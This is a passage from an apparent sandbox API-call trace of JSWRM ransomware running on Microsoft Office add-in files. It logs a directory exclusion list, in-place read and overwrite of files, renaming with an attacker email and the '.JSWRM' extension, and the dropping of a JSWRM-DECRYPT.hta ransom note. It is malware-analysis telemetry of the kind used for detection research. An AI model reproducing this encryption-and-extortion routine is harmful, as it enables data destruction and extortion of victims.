lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.648] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44c8b33, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf44c8b33, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14078, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0123.648] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0123.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.649] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf318faf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf318faf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8040, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0123.649] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0123.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0123.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0123.649] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133819a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133a7bf5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51eb9, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="PowerViewRes.bg.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2=".") returned 1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="..") returned 1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="...") returned 1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="windows") returned -1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="recovery") returned -1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="perflogs") returned 1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="documents and settings") returned 1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="$RECYCLE.BIN") returned 1 [0123.649] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="system volume information") returned -1 [0123.650] lstrcmpiW (lpString1="PowerViewRes.bg.xap", lpString2="msocache") returned 1 [0123.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.bg.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.bg.xap", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.bg.xap", lpUsedDefaultChar=0x0) returned 19 [0123.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.bg.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0123.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.bg.xap", cchWideChar=19, lpMultiByteStr=0x240fc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.bg.xap", lpUsedDefaultChar=0x0) returned 19 [0123.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\PowerViewRes.bg.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bg\\powerviewres.bg.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.650] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=335545) returned 1 [0123.651] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.651] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0123.670] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.670] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0123.671] CloseHandle (hObject=0x338) returned 1 [0123.671] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\PowerViewRes.bg.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bg\\powerviewres.bg.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\bg\\PowerViewRes.bg.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bg\\powerviewres.bg.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.672] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133819a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133819a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133a7bf5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51eb9, dwReserved0=0x60002, dwReserved1=0x236b86, cFileName="PowerViewRes.bg.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0123.672] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0123.673] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x133a7bf5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x133a7bf5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133cde53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="BI-Report.png", cAlternateFileName="BI-REP~1.PNG")) returned 1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2=".") returned 1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="..") returned 1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="...") returned 1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="windows") returned -1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="recovery") returned -1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="perflogs") returned -1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="documents and settings") returned -1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="$RECYCLE.BIN") returned 1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="system volume information") returned -1 [0123.673] lstrcmpiW (lpString1="BI-Report.png", lpString2="msocache") returned -1 [0123.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BI-Report.png", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BI-Report.png", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BI-Report.png", lpUsedDefaultChar=0x0) returned 13 [0123.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BI-Report.png", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BI-Report.png", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BI-Report.png", lpUsedDefaultChar=0x0) returned 13 [0123.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\BI-Report.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bi-report.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.674] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16528) returned 1 [0123.674] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.675] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4090, lpOverlapped=0x0) returned 1 [0123.678] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.678] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4090, lpOverlapped=0x0) returned 1 [0123.678] CloseHandle (hObject=0x314) returned 1 [0123.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\BI-Report.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bi-report.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\BI-Report.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\bi-report.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0123.679] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0123.679] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="...") returned 1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="windows") returned -1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="recovery") returned -1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="perflogs") returned -1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="documents and settings") returned -1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="$RECYCLE.BIN") returned 1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="system volume information") returned -1 [0123.679] lstrcmpiW (lpString1="ca", lpString2="msocache") returned -1 [0123.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ca\\jswrm-decrypt.hta")) returned 0xffffffff [0123.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0123.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0123.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0123.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0123.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0123.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0123.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0123.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0123.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ca\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0123.681] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.681] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0123.682] CloseHandle (hObject=0x314) returned 1 [0123.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0123.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0123.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0123.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0123.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0123.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0123.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0123.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0123.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0123.682] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ca\\jswrm-decrypt.hta")) returned 0x20 [0123.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0123.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0123.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0123.683] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ca\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x406102bb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0123.683] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.683] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42d8c51, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x133f40a9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x406102bb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0123.683] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.683] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.683] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a30a43, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a30a43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x133f40a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4e58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0123.683] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0123.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0123.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0123.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0123.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0123.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 